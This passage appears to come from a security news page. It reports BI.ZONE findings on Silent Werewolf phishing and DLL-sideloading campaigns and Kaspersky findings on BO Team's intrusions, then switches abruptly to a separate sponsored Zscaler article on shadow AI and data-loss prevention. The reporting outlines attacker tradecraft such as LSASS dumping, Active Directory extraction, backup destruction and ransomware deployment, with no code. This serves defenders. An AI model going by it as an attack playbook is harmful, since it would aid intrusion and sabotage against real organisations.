The discovery of a new breed of wiper malware against Ukraine comes as Russian cybersecurity company BI.ZONE uncovered two new campaigns undertaken by Silent Werewolf in March 2025 to infect Moldovan and Russian companies with malware.

“The attackers employed two separate loader instances to retrieve the malicious payload from their C2 server,” the company said. “Unfortunately, the payload itself was not available at the time of this research. However, a retrospective analysis of similar Silent Werewolf campaigns suggests that the threat actor used XDigo malware.”

Some of the targets of the attacks include nuclear, aircraft, instrumentation, and mechanical engineering sectors in Russia. The starting point is a phishing email containing a ZIP file attachment that, in turn, includes an LNK file and a nested ZIP archive. The second ZIP file consists of a legitimate binary, a malicious DLL, and a decoy PDF.

Unpacking and launching the Windows shortcut file triggers the extraction of the nested archive and ultimately causes the rogue DLL to be sideloaded via the legitimate executable (“DeviceMetadataWizard.exe”). The DLL is a C# loader (“d3d9.dll”) that’s designed to retrieve the next-stage payload from a remote server and display the lure document to the victim.

“The adversaries appear to run checks on target systems,” BI.ZONE said. “If a target host does not meet certain criteria, the Llama 2 large language model (LLM) in GGUF format is downloaded from hxxps://huggingface[.]co/TheBloke/Llama-2-70B-GGUF/resolve/main/llama-2-70b.Q5_K_M.gguf.”

“This hinders the comprehensive analysis of the entire attack and allows the threat actor to bypass defenses such as sandboxes.”

The cybersecurity firm said it observed a second campaign that same month targeting unknown sectors in Moldova and, likely, Russia using the same C# loader, but via phishing lures related to official vacation schedules and recommendations for protecting corporate information infrastructure against ransomware attacks.

The cyber espionage group, per BI.ZONE, is believed to be active at least since 2011, targeting a wide range of companies in Russia, Belarus, Ukraine, Moldova and Serbia. The attacks are characterized by the use of phishing lures to deliver malware such as XDSpy, XDigo, and DSDownloader.

Pro-Ukrainian Hacktivist Group BO Team Targets Russia

In recent months, Russian state-owned companies and organizations spanning technology, telecommunications, and production verticals are also said to have come under cyber assaults from a pro-Ukrainian hacktivist group codenamed BO Team (aka Black Owl, Hoody Hyena, and Lifting Zmiy).

“BO Team is a serious threat aimed both at causing maximum damage to the victim and at extracting financial benefits,” Kaspersky researchers said in a report last week, detailing the threat actor’s ability to sabotage victim’s infrastructure and, in some instances, even resorts to data encryption and extortion.

Active since at least January 2024, attacks mounted by the hacktivist cluster are known to leverage post-exploitation frameworks, including Mythic and Cobalt Strike, as well as legitimate remote access and tunneling tools. The group also has a history of accessing confidential data and publishing information about successful attacks in its Telegram channel BO Team.

Initial access to target networks is accomplished by sending phishing emails containing booby-trapped attachments that, when opened, activate an infection chain designed to deploy known commodity malware families like DarkGate, BrockenDoor, and Remcos RAT. Also used are tools such as HandleKatz and NanoDump for dumping LSASS and creating LSASS dumps, respectively.

Armed with the remote access, BO Team has been observed destroying file backups, deleting files using the SDelete utility, and additionally dropping the Windows version of the Babuk encryptor to demand a ransom in exchange for regaining access.

Some of the other activities carried out by the threat actor are listed below –

• Setting up persistence using scheduled tasks
• Assigning malicious component names similar to system or well-known executable files to evade detection
• Extracting the Active Directory database using ntdsutil
• Running various commands to collect information about Telegram, running processes, current users, remote RDP sessions, and antivirus software installed on the endpoints
• Using RDP and SSH protocols to perform lateral movement within Windows and Linux infrastructures
• Dropping legitimate remote access software like AnyDesk for command-and-control

“The BO Team group poses a significant threat to Russian organizations due to its unconventional approach to conducting attacks,” Kaspersky said. “Unlike most pro-Ukrainian hacktivist groups, BO Team actively uses a wide arsenal of malware, including backdoors such as BrockenDoor, Remcos, and DarkGate.”

“These features confirm the high level of autonomy of the group and the absence of stable connections with other representatives of the pro-Ukrainian hacktivist cluster. In the public activity of BO Team, there are practically no signs of interaction, coordination or exchange of tools with other groups. This once again emphasizes its unique profile within the current hacktivist landscape in Russia.”

Jun 06, 2025The Hacker NewsArtificial Intelligence / Zero Trust

When generative AI tools became widely available in late 2022, it wasn’t just technologists who paid attention. Employees across all industries immediately recognized the potential of generative AI to boost productivity, streamline communication and accelerate work. Like so many waves of consumer-first IT innovation before it—file sharing, cloud storage and collaboration platforms—AI landed in the enterprise not through official channels, but through the hands of employees eager to work smarter.

Faced with the risk of sensitive data being fed into public AI interfaces, many organizations responded with urgency and force: They blocked access. While understandable as an initial defensive measure, blocking public AI apps is not a long-term strategy—it’s a stopgap. And in most cases, it’s not even effective.

Shadow AI: The Unseen Risk

The Zscaler ThreatLabz team has been tracking AI and machine learning (ML) traffic across enterprises, and the numbers tell a compelling story. In 2024 alone, ThreatLabz analyzed 36 times more AI and ML traffic than in the previous year, identifying over 800 different AI applications in use.

Blocking has not stopped employees from using AI. They email files to personal accounts, use their phones or home devices, and capture screenshots to input into AI systems. These workarounds move sensitive interactions into the shadows, out of view from enterprise monitoring and protections. The result? A growing blind spot is known as Shadow AI.

Blocking unapproved AI apps may make usage appear to drop to zero on reporting dashboards, but in reality, your organization isn’t protected; it’s just blind to what’s actually happening.

Lessons From SaaS Adoption

We’ve been here before. When early software as a service tool emerged, IT teams scrambled to control the unsanctioned use of cloud-based file storage applications. The answer wasn’t to ban file sharing though; rather it was to offer a secure, seamless, single-sign-on alternative that matched employee expectations for convenience, usability, and speed.

However, this time around the stakes are even higher. With SaaS, data leakage often means a misplaced file. With AI, it could mean inadvertently training a public model on your intellectual property with no way to delete or retrieve that data once it’s gone. There’s no “undo” button on a large language model’s memory.

Visibility First, Then Policy

Before an organization can intelligently govern AI usage, it needs to understand what’s actually happening. Blocking traffic without visibility is like building a fence without knowing where the property lines are.

We’ve solved problems like these before. Zscaler’s position in the traffic flow gives us an unparalleled vantage point. We see what apps are being accessed, by whom and how often. This real-time visibility is essential for assessing risk, shaping policy and enabling smarter, safer AI adoption.

Next, we’ve evolved how we deal with policy. Lots of providers will simply give the black-and-white options of “allow” or “block.” The better approach is context-aware, policy-driven governance that aligns with zero-trust principles that assume no implicit trust and demand continuous, contextual evaluation. Not every use of AI presents the same level of risk and policies should reflect that.

For example, we can provide access to an AI application with caution for the user or allow the transaction only in browser-isolation mode, which means users aren’t able to paste potentially sensitive data into the app. Another approach that works well is redirecting users to a corporate-approved alternative app which is managed on-premise. This lets employees reap productivity benefits without risking data exposure. If your users have a secure, fast, and sanctioned way to use AI, they won’t need to go around you.

Last, Zscaler’s data protection tools mean we can allow employees to use certain public AI apps, but prevent them from inadvertently sending out sensitive information. Our research shows over 4 million data loss prevention (DLP) violations in the Zscaler cloud, representing instances where sensitive enterprise data—such as financial data, personally identifiable information, source code, and medical data—was intended to be sent to an AI application, and that transaction was blocked by Zscaler policy. Real data loss would have occurred in these AI apps without Zscaler’s DLP enforcement.

Balancing Enablement With Protection

This isn’t about stopping AI adoption—it’s about shaping it responsibly. Security and productivity don’t have to be at odds. With the right tools and mindset, organizations can achieve both: empowering users and protecting data.

Learn more at zscaler.com/security